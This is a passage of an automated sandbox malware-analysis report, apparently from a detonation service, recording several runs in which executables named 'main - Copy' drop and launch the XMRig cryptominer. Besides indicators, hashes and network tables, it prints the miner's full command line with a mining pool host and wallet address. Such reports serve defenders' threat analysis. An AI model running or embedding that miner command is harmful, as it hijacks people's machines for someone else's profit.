memory/5052-63-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-64-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-65-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-66-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-67-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-68-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-69-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-70-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-71-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-72-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-73-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-74-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-75-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-76-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-77-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-78-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-79-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-80-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-81-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-82-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-83-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
memory/5052-84-0x00007FF725AA0000-0x00007FF7265A3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3704 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3704 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4340-16-0x00000238CC4F0000-0x00000238CC510000-memory.dmp
memory/4340-17-0x00000238CC750000-0x00000238CC770000-memory.dmp
memory/4340-18-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-20-0x00000238CE040000-0x00000238CE060000-memory.dmp
memory/4340-19-0x00000238CE020000-0x00000238CE040000-memory.dmp
memory/4340-21-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-22-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-23-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-25-0x00000238CE040000-0x00000238CE060000-memory.dmp
memory/4340-24-0x00000238CE020000-0x00000238CE040000-memory.dmp
memory/4340-26-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-27-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-28-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-29-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-30-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-31-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-32-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-33-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-34-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-35-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-36-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-37-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-38-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-39-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-40-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-41-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-42-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-43-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-44-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-45-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-46-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-47-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-48-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-49-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-50-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-51-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-52-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-53-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-54-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-55-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-56-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-57-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-58-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-59-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-60-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-61-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-62-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-63-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-64-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-65-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-66-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-67-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-68-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-69-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-70-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-71-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-72-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-73-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-74-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-75-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-76-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-77-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-78-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-79-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-80-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-81-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-82-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-83-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
memory/4340-84-0x00007FF6CD5E0000-0x00007FF6CE0E3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2444 wrote to memory of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2444 wrote to memory of 3152 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3812,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=1036 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4184,i,13640054265074968359,8146127767143474550,262144 --variations-seed-version --mojo-platform-channel-handle=2352 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3152-16-0x000001F1FCA30000-0x000001F1FCA50000-memory.dmp
memory/3152-17-0x000001F1FCB80000-0x000001F1FCBA0000-memory.dmp
memory/3152-18-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-19-0x000001F1FCBA0000-0x000001F1FCBC0000-memory.dmp
memory/3152-20-0x000001F1FCBC0000-0x000001F1FCBE0000-memory.dmp
memory/3152-21-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-22-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-23-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-24-0x000001F1FCBA0000-0x000001F1FCBC0000-memory.dmp
memory/3152-25-0x000001F1FCBC0000-0x000001F1FCBE0000-memory.dmp
memory/3152-26-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-27-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-28-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-29-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-30-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-31-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-32-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-33-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-34-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-35-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-36-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-37-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-38-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-39-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-40-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-41-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-42-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-43-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-44-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-45-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-46-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-47-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-48-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-49-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-50-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-51-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-52-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-53-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-54-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-55-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-56-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-57-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-58-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-59-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-60-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-61-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-62-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-63-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-64-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-65-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-66-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-67-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-68-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-69-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-70-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-71-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-72-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-73-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-74-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-75-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-76-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-77-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-78-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-79-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-80-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-81-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-82-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-83-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
memory/3152-84-0x00007FF6E98B0000-0x00007FF6EA3B3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
